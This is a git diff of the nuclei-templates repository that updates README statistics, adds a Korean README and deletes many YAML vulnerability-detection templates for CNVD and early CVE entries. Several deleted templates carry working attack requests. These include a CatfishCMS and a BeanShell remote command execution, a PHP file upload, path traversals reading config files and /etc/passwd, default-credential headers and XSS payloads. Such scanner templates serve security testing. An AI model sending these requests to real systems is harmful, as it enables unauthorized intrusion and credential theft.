.pre-commit-config.yml
|
||||
.github/workflows/*.yml
|
||||
.github/
|
||||
.git/
|
||||
*.yml
|
||||
|
||||
rules:
|
||||
document-start: disable
|
||||
|
@ -15,3 +17,5 @@ rules:
|
|||
require-starting-space: true
|
||||
ignore-shebangs: true
|
||||
min-spaces-from-content: 1
|
||||
empty-lines:
|
||||
max: 5
|
|
@ -24,5 +24,5 @@ I've validated this template locally?
|
|||
|
||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
|
||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
24
README.md
24
README.md
|
@ -41,19 +41,19 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
## Nuclei Templates Top 10 statistics
|
||||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
|
||||
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
|
||||
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
|
||||
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
|
||||
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
|
||||
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
|
||||
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
|
||||
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
|
||||
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
|
||||
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
|
||||
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
|
||||
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
|
||||
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
|
||||
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
|
||||
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
|
||||
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
||||
**201 directories, 2879 files**.
|
||||
**395 directories, 6435 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -0,0 +1,96 @@
|
|||
|
||||
|
||||
<h1 align="center">
|
||||
Nuclei 템플릿
|
||||
</h1>
|
||||
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
|
||||
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
|
||||
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
|
||||
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a> •
|
||||
<a href="#-contributions">기여</a> •
|
||||
<a href="#-discussion">논의</a> •
|
||||
<a href="#-community">커뮤니티</a> •
|
||||
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a> •
|
||||
<a href="https://discord.gg/projectdiscovery">디스코드</a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a> •
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
|
||||
</p>
|
||||
|
||||
----
|
||||
|
||||
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
|
||||
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
|
||||
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
|
||||
|
||||
## Nuclei 템플릿 개요
|
||||
|
||||
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
|
||||
|
||||
<table>
|
||||
<tr>
|
||||
<td>
|
||||
|
||||
## Nuclei 템플릿 통계 Top 10
|
||||
|
||||
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
|
||||
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
|
||||
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
|
||||
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
|
||||
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
|
||||
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
|
||||
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
|
||||
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
|
||||
| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
|
||||
| tech | 286 | gy741 | 126 | file | 76 | | | | |
|
||||
|
||||
**286개 디렉토리, 4012개 파일**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
📖 문서
|
||||
-----
|
||||
|
||||
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
|
||||
|
||||
💪 기여
|
||||
-----
|
||||
|
||||
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
|
||||
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
|
||||
|
||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
||||
|
||||
💬 논의
|
||||
-----
|
||||
|
||||
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
|
||||
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
|
||||
|
||||
👨💻 커뮤니티
|
||||
-----
|
||||
|
||||
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
|
||||
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
|
||||
:heart:
|
File diff suppressed because one or more lines are too long
4478
TEMPLATES-STATS.md
4478
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
22
TOP-10.md
22
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 945 | daffainfo | 434 | cves | 951 | info | 979 | http | 2628 |
|
||||
| lfi | 399 | dhiyaneshdk | 360 | vulnerabilities | 376 | high | 727 | file | 57 |
|
||||
| panel | 377 | pikpikcu | 293 | exposed-panels | 375 | medium | 536 | network | 48 |
|
||||
| xss | 294 | pdteam | 232 | technologies | 213 | critical | 339 | dns | 12 |
|
||||
| wordpress | 277 | geeknik | 173 | exposures | 197 | low | 172 | | |
|
||||
| exposure | 260 | dwisiswant0 | 159 | misconfiguration | 170 | | | | |
|
||||
| rce | 247 | pussycat0x | 98 | token-spray | 146 | | | | |
|
||||
| tech | 223 | gy741 | 93 | workflows | 86 | | | | |
|
||||
| cve2021 | 207 | 0x_akoko | 91 | default-logins | 67 | | | | |
|
||||
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1805 | dhiyaneshdk | 815 | http | 5763 | info | 2830 | file | 118 |
|
||||
| panel | 883 | dwisiswant0 | 794 | workflows | 190 | high | 1247 | dns | 18 |
|
||||
| wordpress | 775 | daffainfo | 663 | file | 118 | medium | 1019 | | |
|
||||
| wp-plugin | 666 | pikpikcu | 353 | network | 89 | critical | 671 | | |
|
||||
| exposure | 661 | pdteam | 278 | dns | 18 | low | 215 | | |
|
||||
| osint | 639 | pussycat0x | 237 | ssl | 11 | unknown | 26 | | |
|
||||
| xss | 632 | geeknik | 220 | headless | 9 | | | | |
|
||||
| tech | 602 | ricardomaia | 215 | cves.json | 1 | | | | |
|
||||
| edb | 595 | ritikchaddha | 198 | contributors.json | 1 | | | | |
|
||||
| lfi | 541 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
|
|
@ -1,29 +0,0 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
|
@ -1,27 +0,0 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: medium
|
||||
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
||||
tags: rce,cnvd,catfishcms,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
||||
condition: and
|
|
@ -1,27 +0,0 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi Local File read
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
condition: and
|
|
@ -1,29 +0,0 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,31 +0,0 @@
|
|||
id: CNVD-2020-62422
|
||||
|
||||
info:
|
||||
name: Seeyon readfile(CNVD-2020-62422)
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd,cnvd2020,seeyon
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-msdownload"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ctpDataSource.password"
|
||||
condition: and
|
|
@ -1,42 +0,0 @@
|
|||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 Path Traversal
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
tags: weiphp,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
"1":1
|
||||
- |
|
||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
- |
|
||||
GET {{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '/public/uploads/picture/(.*.jpg)'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- https://weiphp.cn
|
||||
- WeiPHP
|
||||
- DB_PREFIX
|
||||
condition: and
|
|
@ -1,25 +0,0 @@
|
|||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/authenticationserverservlet"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "<username>(.*?)</username>"
|
||||
- "<password>(.*?)</password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,25 +0,0 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
tags: shopxo,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,28 +0,0 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
tags: ruijie,disclosure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,43 +0,0 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
tags: beanshell,rce,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,38 +0,0 @@
|
|||
id: CNVD-2021-49104
|
||||
|
||||
info:
|
||||
name: Pan Micro E-office File Uploads
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://chowdera.com/2021/12/202112200602130067.html
|
||||
tags: pan,micro,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4
|
||||
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
|
||||
Content-Type: image/jpeg
|
||||
|
||||
<?php echo md5('CNVD-2021-49104');?>
|
||||
|
||||
--e64bdf16c554bbc109cecef6451c26a4--
|
||||
|
||||
- |
|
||||
GET /images/logo/logo-eoffice.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "94d01a2324ce38a2e29a629c54190f67"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1 @@
|
|||
007505eab9adec1b628522c2675730ee
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2000-0114
|
||||
|
||||
info:
|
||||
name: Microsoft FrontPage Extensions Check (shtml.dll)
|
||||
author: r3naissance
|
||||
severity: low
|
||||
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
|
||||
- https://www.exploit-db.com/exploits/19897
|
||||
tags: cve,cve2000,frontpage,microsoft
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_vti_inf.html'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "_vti_bin/shtml.dll"
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2001-1473
|
||||
|
||||
info:
|
||||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-score: 7.4
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
|
||||
network:
|
||||
- host:
|
||||
- "{{Hostname}}"
|
||||
- "{{Host}}:22"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "SSH-1"
|
|
@ -1,35 +0,0 @@
|
|||
id: CVE-2002-1131
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
reference: https://www.exploit-db.com/exploits/21811
|
||||
tags: xss,squirrelmail,cve,cve2002
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
|
||||
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
|
||||
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2004-0519
|
||||
|
||||
info:
|
||||
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
||||
author: dhiyaneshDk
|
||||
severity: medium
|
||||
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
|
||||
reference: https://www.exploit-db.com/exploits/24068
|
||||
tags: xss,squirrelmail,cve2004,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -1,25 +0,0 @@
|
|||
id: CVE-2005-2428
|
||||
info:
|
||||
name: CVE-2005-2428
|
||||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
reference:
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/names.nsf/People?OpenView"
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
name: domino-username
|
||||
regex:
|
||||
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
|
||||
part: body
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
|
@ -1,30 +0,0 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
